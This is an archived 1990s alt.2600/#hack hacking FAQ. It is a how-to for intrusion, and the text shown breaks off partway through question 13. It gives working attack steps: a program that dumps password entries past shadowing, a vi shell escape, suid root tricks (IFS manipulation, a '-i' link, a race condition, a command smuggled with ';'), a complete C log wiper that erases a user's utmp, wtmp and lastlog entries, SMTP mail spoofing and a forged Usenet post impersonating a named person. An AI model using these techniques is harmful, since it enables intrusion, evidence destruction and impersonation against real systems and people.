💾 Archived View for gemini.spam.works › mirrors › textfiles › hacking › INTERNET › hackfaq.hac captured on 2023-01-29 at 04:30:15.
⬅️ Previous capture (2022-03-01)
-=-=-=-=-=-=-
Summary: This posting contains a list of Frequently Asked
Questions (and their answers) about hacking. It
should be read by anyone who wishes to post to the
alt.2600 newsgroup or use the IRC channel #hack.
Editors Note: Welcome to Beta .007, licensed to amuse.
This release of the #hack FAQ is now the alt.2600/#hack
FAQ. Tomes, editor of the alt.2600 FAQ, and I
have merged our two FAQ's into one. Eleet greets go out
to Tomes.
This release is dedicated to Eric S. Real
<esr@locke.ccil.org> for not only emailing me the first
real flame for the FAQ, but also including a huge
advertisement for a book he is hawking.
To quote our little buddy Eric "I will denounce you and
your cracker pals as the pathetic scum you are. *And*
do my best to see that as many as possible of you end up
in Leavenworth getting butt-fucked by reality." Eric,
this Bud's for you.
Many sections are missing or incomplete. The #hack FAQ
comes with no warranties, express or implied.
If you have a questions regarding any of the topics
covered in the FAQ, please direct it to alt.2600 or
#hack. Please do not e-mail me with them, I'm getting
swamped.
If your copy of the #hack FAQ does not end with the
letters EOT on a line by themselves, you do not have the
entire FAQ.
I promise to spell check this beast before I release
version 1.0.
** BETA **
Beta Revision .007
alt.2600/#Hack F.A.Q.
by
Voyager
will@gnu.ai.mit.edu
Sysop of
Hacker's Haven
(303)343-4053
With special thanks to:
A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow,
Major, Presence, Rogue Agent, sbin, Tomes and TheSaint.
We work in the dark
We do what we can
We give what we have
Our doubt is our passion,
and our passion is our task
The rest is the madness of art.
-- Henry James
Section A: Computers
01. How do I access the password file under Unix?
02. How do I crack Unix passwords?
03. How do I access the password file under VMS?
04. How do I crack VMS passwords?
05. What is NIS/yp?
06. What is password shadowing?
07. How do I break out of a restricted shell?
08. How do I gain root from a suid script or program?
09. How do I erase my presence from the system logs?
10. How do I send fakemail?
11. How do I fake posts to UseNet?
12. How do I hack ChanOp on IRC?
13. How do I modify the IRC client to hide my real username?
14. What is a trojan/worm/virus/logic bomb?
15. How can I protect myself from virii and such?
16. What is Cryptoxxxxxxx?
17. What is PGP?
18. What is Tempest?
U 19. How to I change to directores with strange characters in them?
20. What is ethernet sniffing?
21. What is an Internet Outdial?
22. What are some Internet Outdials?
N 23. How do I defeat copy protection?
N 24. What is this system?
N 25. What are the default accounts for XXX ?
N 26. What port is XXX on?
Section B: Telephony
U 01. What is a Red Box?
U 02. How do I build a Red Box?
N 03. Where can I get a 6.5536Mhz crystal?
04. Which payphones will a Red Box work on?
05. What is a Blue Box?
06. Do Blue Boxes still work?
07. What is a Black Box?
08. What do all the colored boxes do?
U 09. What is the ANAC number for my area?
10. What is a ringback number?
U 11. What is the ringback number for my area?
12. What is a loop?
13. What is a loop in my area?
14. What is a CNA number?
U 15. What is the telephone company CNA number for my area?
16. What is scanning?
17. Is scanning illegal?
N 18. Where can I purchase a lineman's handset?
N 19. What are the DTMF frequencies?
Section C: Resources
U 01. What are some ftp sites of interest to hackers?
U 02. What are some newsgroups of interest to hackers?
03. What are some telnet sites of interest to hackers?
U 04. What are some gopher sites of interest to hackers?
U 05. What are some World wide Web (WWW) sites of interest to hackers?
06. What are some IRC channels of interest to hackers?
07. What are some BBS's of interest to hackers?
08. What books are available on this subject?
U 09. What are some mailing lists of interest to hackers?
N 10. What are some print magazines of interest to hackers?
N 11. What are some organizations of interest to hackers?
Section D: 2600
N 01. What is alt.2600?
N 02. What does "2600" mean?
N 03. Are there on-line versions of 2600 available?
N 04. I can't find 2600 at any bookstores. What can I do?
N 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
Section E: Miscellaneous
U 01. What does XXX stand for?
N 02. How do I determine if I have a valid credit card number?
U 03. Where can I get a copy of the #hack FAQ?
U == Updated since last release of the #hack FAQ
N == New since last release of the #hack FAQ
Section A: Computers
~~~~~~~~~~~~~~~~~~~~
01. How do I access the password file under Unix?
In standard Unix the password file is /etc/passwd. On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.
02. How do I crack Unix passwords?
Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are encrypted with a one way function. The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.
Password cracking software uses wordlists. Each word in the wordlist
is encrypted with each of the 4096 possible salt values and the
results are compared to the encrypted form of the target password.
The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
CrackerJack.
03. How do I access the password file under VMS?
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
unlike Unix, most users do not have access to read the password file.
04. How do I crack VMS passwords?
Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.
Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.
05. What is NIS/yp?
NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages). The purpose for NIS is to allow many
machies on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:
+::0:0:::
To view the real password file use this command "ypcat passwd"
06. What is password shadowing?
Password shadowing is a security system where the encrypted password
field of /etc/password is replaced with a special token and the
encrypted password is stored in a seperate file which is not readable
by normal system users.
To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
07. How do I break out of a restricted shell?
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
08. How do I gain root from a suid script or program?
1. Change IFS.
If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS. IFS is the Internal
Field Seperator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input the the program.
Invoke the name of the program and a seperate command on the same
command line.
Example:
suidprog ; id
09. How do I erase my presence from the system logs?
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.
Example:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
10. How do I send fakemail?
Telnet to port 25 of the machine you want the mail to appear to
originate from. Enter your message as in this example:
HELO bellcore.com
MAIL FROM:Voyagor@bellcore.com
RCPT TO:clinton@whitehouse.gov
DATA
Please discontinue your silly Clipper initiative.
.
QUIT
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work. Test by sending yourself fakemail first.
11. How do I fake posts to UseNet?
Use inews to post. Give inews the following lines:
From:
Newsgroups:
Subject:
Message-ID:
Date:
Organization:
For a moderated newsgroup, inews will also require this line:
Approved:
Then add your post and terminate with <Control-D>.
Example:
From: Eric S. Real
Newsgroups: alt.hackers
Subject: Pathetic bunch of wannabe losers
Message-ID: <esr.123@locke.ccil.org>
Date: Fri, 13 Aug 1994 12:15:03
Organization: Moral Majority
A pathetic bunch of wannabe losers is what most of you are, with no
right to steal the honorable title of `hacker' to puff up your silly
adolescent egos. Get stuffed, get lost, and go to jail.
Eric S. Raymond <esr@locke.ccil.org>
^D
Note that many systems will append an Originator: line to your message
header, effectively revealing the account from which the message was
posted.
12. How do I hack ChanOp on IRC?
Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on. When
that server reconnects to the net, you will have ChanOp on the real
channel. If you have ServerOp on a server, you can cause it to split
on purpose.
13. How do I modify the IRC client to hide my real username?
Get the IRC client from cs.bu.edu /irc/clients. Look at the source
code files irc.c and ctcp.c. The code you are looking for is fairly
easy to spot. Change it. Change the username code in irc.c and the
ctcp information code in ctcp.c. Compile and run your client.
Here are the diffs from a sample hack of the IRC client. Your client
code will vary slighty depending on what IRC client version you are
running.